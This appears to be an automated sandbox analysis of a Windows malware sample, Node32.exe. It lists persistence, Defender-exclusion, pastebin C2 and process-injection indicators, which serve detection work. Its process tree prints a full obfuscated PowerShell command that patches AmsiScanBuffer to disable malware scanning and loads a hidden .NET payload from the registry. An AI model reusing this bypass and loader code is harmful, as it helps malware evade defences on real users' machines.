bd7a853e20ec918539038278bb788fea3314d1da09e7f75608d13a8cd2436362

Analysis

max time kernel
78s
max time network
155s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
17-11-2024 17:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmpfile-main/Node32.exe
Size

366KB
MD5

31be6f6a2cbf1c49790b490df463500a
SHA1

878a2fee90a2ceb49213a5b5742499ca8e14fec0
SHA256

6d4222db12dd717bef62cabc134fbbdad8033767780eeb6d7322a38b8a2a81de
SHA512

8b3c2e96ee85502d4ebd750e94397915370f47543cb7ce0c0b598407319387727678daac28dd843f0d61685b83fb8597cf473091774cdf74cdc9dd98f9a06d37
SSDEEP

6144:NClTCNaC5liBrWdzoRQJx9LDmaAF5kDERQp+QDW9WkkHp683KX:NUolitMIaAFkJ6

Score

10^/10

discovery execution persistence

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 3676 created 636 3676 powershell.EXE winlogon.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXE

pid process

3872 powershell.exe
1104 powershell.exe
2064 powershell.exe
3676 powershell.EXE
Executes dropped EXE 3 IoCs

Processes:

$Node32.exe$Node2Json.exe$Node3Json.exe

pid process

5112 $Node32.exe
1616 $Node2Json.exe
4564 $Node3Json.exe

description	pid	process	target process
PID 3676 created 636	3676	powershell.EXE	winlogon.exe

pid	process
5112	$Node32.exe
1616	$Node2Json.exe
4564	$Node3Json.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Node32.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe"	Node32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe"	Node32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe"	Node32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

1 pastebin.com
3 pastebin.com
4 pastebin.com

flow	ioc
1	pastebin.com
3	pastebin.com
4	pastebin.com

Drops file in System32 directory 8 IoCs

Processes:

Node32.exepowershell.EXE

description	ioc	process
File created	C:\Windows\System32\$Node3Json.exe	Node32.exe
File opened for modification	C:\Windows\System32\$Node3Json.exe	Node32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\System32\$Node32.exe	Node32.exe
File opened for modification	C:\Windows\System32\$Node32.exe	Node32.exe
File created	C:\Windows\System32\$Node2Json.exe	Node32.exe
File opened for modification	C:\Windows\System32\$Node2Json.exe	Node32.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 3676 set thread context of 1264 3676 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

$Node32.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $Node32.exe

description	pid	process	target process
PID 3676 set thread context of 1264	3676	powershell.EXE	dllhost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$Node32.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Modifies data under HKEY_USERS 41 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4828 schtasks.exe
2104 schtasks.exe
1848 schtasks.exe

pid	process
4828	schtasks.exe
2104	schtasks.exe
1848	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.exedllhost.exe

pid	process
3872	powershell.exe
3872	powershell.exe
1104	powershell.exe
1104	powershell.exe
3676	powershell.EXE
3676	powershell.EXE
2064	powershell.exe
2064	powershell.exe
3676	powershell.EXE
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe
1264	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEpowershell.exedllhost.exe$Node2Json.exe$Node3Json.exeExplorer.EXEsvchost.exe

description	pid	process
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	3676	powershell.EXE
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	3676	powershell.EXE
Token: SeDebugPrivilege	1264	dllhost.exe
Token: SeDebugPrivilege	1616	$Node2Json.exe
Token: SeDebugPrivilege	4564	$Node3Json.exe
Token: SeShutdownPrivilege	3228	Explorer.EXE
Token: SeCreatePagefilePrivilege	3228	Explorer.EXE
Token: SeShutdownPrivilege	3228	Explorer.EXE
Token: SeCreatePagefilePrivilege	3228	Explorer.EXE
Token: SeShutdownPrivilege	3228	Explorer.EXE
Token: SeCreatePagefilePrivilege	3228	Explorer.EXE
Token: SeShutdownPrivilege	3228	Explorer.EXE
Token: SeCreatePagefilePrivilege	3228	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2732	svchost.exe
Token: SeIncreaseQuotaPrivilege	2732	svchost.exe
Token: SeSecurityPrivilege	2732	svchost.exe
Token: SeTakeOwnershipPrivilege	2732	svchost.exe
Token: SeLoadDriverPrivilege	2732	svchost.exe
Token: SeSystemtimePrivilege	2732	svchost.exe
Token: SeBackupPrivilege	2732	svchost.exe
Token: SeRestorePrivilege	2732	svchost.exe
Token: SeShutdownPrivilege	2732	svchost.exe
Token: SeSystemEnvironmentPrivilege	2732	svchost.exe
Token: SeUndockPrivilege	2732	svchost.exe
Token: SeManageVolumePrivilege	2732	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2732	svchost.exe
Token: SeIncreaseQuotaPrivilege	2732	svchost.exe
Token: SeSecurityPrivilege	2732	svchost.exe
Token: SeTakeOwnershipPrivilege	2732	svchost.exe
Token: SeLoadDriverPrivilege	2732	svchost.exe
Token: SeSystemtimePrivilege	2732	svchost.exe
Token: SeBackupPrivilege	2732	svchost.exe
Token: SeRestorePrivilege	2732	svchost.exe
Token: SeShutdownPrivilege	2732	svchost.exe
Token: SeSystemEnvironmentPrivilege	2732	svchost.exe
Token: SeUndockPrivilege	2732	svchost.exe
Token: SeManageVolumePrivilege	2732	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2732	svchost.exe
Token: SeIncreaseQuotaPrivilege	2732	svchost.exe
Token: SeSecurityPrivilege	2732	svchost.exe
Token: SeTakeOwnershipPrivilege	2732	svchost.exe
Token: SeLoadDriverPrivilege	2732	svchost.exe
Token: SeSystemtimePrivilege	2732	svchost.exe
Token: SeBackupPrivilege	2732	svchost.exe
Token: SeRestorePrivilege	2732	svchost.exe
Token: SeShutdownPrivilege	2732	svchost.exe
Token: SeSystemEnvironmentPrivilege	2732	svchost.exe
Token: SeUndockPrivilege	2732	svchost.exe
Token: SeManageVolumePrivilege	2732	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2732	svchost.exe
Token: SeIncreaseQuotaPrivilege	2732	svchost.exe
Token: SeSecurityPrivilege	2732	svchost.exe
Token: SeTakeOwnershipPrivilege	2732	svchost.exe
Token: SeLoadDriverPrivilege	2732	svchost.exe
Token: SeSystemtimePrivilege	2732	svchost.exe
Token: SeBackupPrivilege	2732	svchost.exe
Token: SeRestorePrivilege	2732	svchost.exe
Token: SeShutdownPrivilege	2732	svchost.exe
Token: SeSystemEnvironmentPrivilege	2732	svchost.exe
Token: SeUndockPrivilege	2732	svchost.exe
Token: SeManageVolumePrivilege	2732	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Node32.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 4452 wrote to memory of 3872	4452	Node32.exe	powershell.exe
PID 4452 wrote to memory of 3872	4452	Node32.exe	powershell.exe
PID 4452 wrote to memory of 4828	4452	Node32.exe	schtasks.exe
PID 4452 wrote to memory of 4828	4452	Node32.exe	schtasks.exe
PID 4452 wrote to memory of 5112	4452	Node32.exe	$Node32.exe
PID 4452 wrote to memory of 5112	4452	Node32.exe	$Node32.exe
PID 4452 wrote to memory of 5112	4452	Node32.exe	$Node32.exe
PID 4452 wrote to memory of 1104	4452	Node32.exe	powershell.exe
PID 4452 wrote to memory of 1104	4452	Node32.exe	powershell.exe
PID 4452 wrote to memory of 2104	4452	Node32.exe	schtasks.exe
PID 4452 wrote to memory of 2104	4452	Node32.exe	schtasks.exe
PID 4452 wrote to memory of 1616	4452	Node32.exe	$Node2Json.exe
PID 4452 wrote to memory of 1616	4452	Node32.exe	$Node2Json.exe
PID 4452 wrote to memory of 2064	4452	Node32.exe	powershell.exe
PID 4452 wrote to memory of 2064	4452	Node32.exe	powershell.exe
PID 4452 wrote to memory of 1848	4452	Node32.exe	schtasks.exe
PID 4452 wrote to memory of 1848	4452	Node32.exe	schtasks.exe
PID 4452 wrote to memory of 4564	4452	Node32.exe	$Node3Json.exe
PID 4452 wrote to memory of 4564	4452	Node32.exe	$Node3Json.exe
PID 3676 wrote to memory of 1264	3676	powershell.EXE	dllhost.exe
PID 3676 wrote to memory of 1264	3676	powershell.EXE	dllhost.exe
PID 3676 wrote to memory of 1264	3676	powershell.EXE	dllhost.exe
PID 3676 wrote to memory of 1264	3676	powershell.EXE	dllhost.exe
PID 3676 wrote to memory of 1264	3676	powershell.EXE	dllhost.exe
PID 3676 wrote to memory of 1264	3676	powershell.EXE	dllhost.exe
PID 3676 wrote to memory of 1264	3676	powershell.EXE	dllhost.exe
PID 3676 wrote to memory of 1264	3676	powershell.EXE	dllhost.exe
PID 1264 wrote to memory of 636	1264	dllhost.exe	winlogon.exe
PID 1264 wrote to memory of 704	1264	dllhost.exe	lsass.exe
PID 1264 wrote to memory of 988	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 484	1264	dllhost.exe	dwm.exe
PID 1264 wrote to memory of 728	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 644	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1080	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1088	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1184	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1224	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1268	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1340	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1404	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1488	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1512	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1620	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1632	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1684	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1740	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1796	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1864	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1908	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1984	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1988	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1812	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 1032	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 2172	1264	dllhost.exe	spoolsv.exe
PID 1264 wrote to memory of 2260	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 2384	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 2524	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 2532	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 2568	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 2624	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 2644	1264	dllhost.exe	sysmon.exe
PID 1264 wrote to memory of 2708	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 2732	1264	dllhost.exe	svchost.exe
PID 1264 wrote to memory of 2748	1264	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:636
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:484
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{97d258cf-2ee0-478f-93f9-a0d4c7be1591}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1264

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:728

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1224
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xWzjQEKjlUBc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jaVyXQBQSbDWkT,[Parameter(Position=1)][Type]$gPCINVAUrx)$oIhzsJlocWk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'c'+[Char](116)+'e'+'d'+''+'D'+''+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+'M'+[Char](101)+'mo'+'r'+''+[Char](121)+''+[Char](77)+'od'+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+''+'d'+','+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+'Cl'+[Char](97)+'s'+'s'+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+[Char](67)+'la'+'s'+''+[Char](115)+'',[MulticastDelegate]);$oIhzsJlocWk.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+'ia'+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+'ig'+','+''+'P'+'ubl'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$jaVyXQBQSbDWkT).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$oIhzsJlocWk.DefineMethod(''+'I'+''+[Char](110)+''+'v'+'oke','P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+','+'H'+'id'+[Char](101)+''+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+'o'+'t'+[Char](44)+''+'V'+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$gPCINVAUrx,$jaVyXQBQSbDWkT).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $oIhzsJlocWk.CreateType();}$FGZUXMLRickhx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+'.dl'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$PhYOlJRAloVAin=$FGZUXMLRickhx.GetMethod('G'+'e'+''+[Char](116)+'P'+'r'+''+'o'+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'ti'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$taptpzezeSbqBEsrKDo=xWzjQEKjlUBc @([String])([IntPtr]);$NDkBSGGmBwaloeKmtNewIv=xWzjQEKjlUBc @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pXtrnnuIUQk=$FGZUXMLRickhx.GetMethod('G'+[Char](101)+''+[Char](116)+''+'M'+''+'o'+''+'d'+''+'u'+''+'l'+''+'e'+'Ha'+[Char](110)+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+'l'+[Char](108)+'')));$quZwrFGVLvwemi=$PhYOlJRAloVAin.Invoke($Null,@([Object]$pXtrnnuIUQk,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+'i'+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$qMuKjRYdbLQDEFuJw=$PhYOlJRAloVAin.Invoke($Null,@([Object]$pXtrnnuIUQk,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$RBazRtW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($quZwrFGVLvwemi,$taptpzezeSbqBEsrKDo).Invoke(''+[Char](97)+''+[Char](109)+'si'+[Char](46)+'dl'+[Char](108)+'');$MPHYflyekHXPxBQNn=$PhYOlJRAloVAin.Invoke($Null,@([Object]$RBazRtW,[Object](''+'A'+'m'+'s'+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'nBu'+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$vuvDEluMke=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qMuKjRYdbLQDEFuJw,$NDkBSGGmBwaloeKmtNewIv).Invoke($MPHYflyekHXPxBQNn,[uint32]8,4,[ref]$vuvDEluMke);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$MPHYflyekHXPxBQNn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qMuKjRYdbLQDEFuJw,$NDkBSGGmBwaloeKmtNewIv).Invoke($MPHYflyekHXPxBQNn,[uint32]8,0x20,[ref]$vuvDEluMke);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+'TW'+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](78)+''+[Char](111)+''+'d'+''+[Char](101)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1340

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1404

